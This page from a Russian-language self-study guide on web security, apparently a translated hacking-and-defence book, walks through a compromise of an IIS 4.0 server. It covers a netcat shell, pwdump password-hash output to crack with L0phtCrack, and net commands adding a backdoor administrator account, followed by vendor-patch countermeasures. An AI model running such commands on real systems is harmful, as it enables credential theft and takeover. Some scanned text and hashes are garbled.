Иллюстрированный самоучитель по Secure Web

         

in account for administering the



C:\>nc -nw 10.11.1.1 26

(UNKNOWN) [10.11.1.1] 26 (?) open Microsoft(R)

Windows NT (TM) (C) Copyright 1985-1996 Microsoft Corp.

С:>pwdump

administrator:500:03096B7CD9133319790F5B37EAB66"E30:

5ACA8A3A546DD587A 58A251205881082:

Built- in account for administering the computer/doma in:

Guest:501:NO PASSWORD

**************;NO PASSWORD**************

*******:Built-in account for guest access to the computer/domain::

sqldude:1000:853FD8DOFA7ECFOFAAD3B435B

51404EE:EE319BA58C3E9BCB45AB13 CD7651FE14:::

SQLExecutiveCmdExec:1001:01FC5A6BE7BC6929AAD3B435B51404EE:

OCB6948805 F797BF2A82807973B89537:SQLExecutiveCmdExec,

SQL Executive CmdExec Task Account:C_:

С помощью простых команд копирования и вставки, применяемых в командной строке, а также программы LOphtCrack, которая используется для взлома хеш-кодов, можно получить в свое распоряжение пароль администратора (и любого другого пользователя системы).

Более простая (но менее скрытая) атака заключается в создании нового пользователя с помощью команды net localgroup password haxor /add, а затем добавление этого пользователя (в данном случае haxor) в группу администраторов с помощью команды net localgroup Administrators haxor /add. Если порт NetBIOS сервера (TCP 139) открыт для взломщика, то он может к нему подключиться и делать все что угодно. Конечно же, поскольку взломщик выполняет в системе значительные изменения, то их можно выявить с использованием простых средств аудита системы.

Контрмеры против изъянов US 4.0

Сначала компания Microsoft разработала комплекс рекомендаций для устранения этой проблемы, а затем выпустила модуль обновления. Группа экспертов eEye выпустила свой собственный модуль обновления, однако всегда рекомендуется использовать средства от производителя.

Изъян переполнения полей

У читателя может возникнуть вопрос, "Действительно ли можно взломать Web-сервер, пользуясь только Web-броузером?" На этот вопрос можно ответить вполне определенно: "ДА". Программисты в Web в первую очередь заботятся о производительности, отодвигая вопросы безопасности на второй план. Лучше всего это видно на примере ошибки, возникающей при переполнении буфера на сервере Cold Fusion, которая была обнаружена группой Foundstone. Проблема заключается в том, каким образом компания Allaire реализовала проверку достоверности входных данных, которые вводятся в поле пароля администратора. Пользуясь недостаточно полной очисткой этого поля, взломщик с помощью одного броузера может практически полностью вывести Web-сервер из строя. Вот как это можно сделать.

Содержание  Назад  Вперед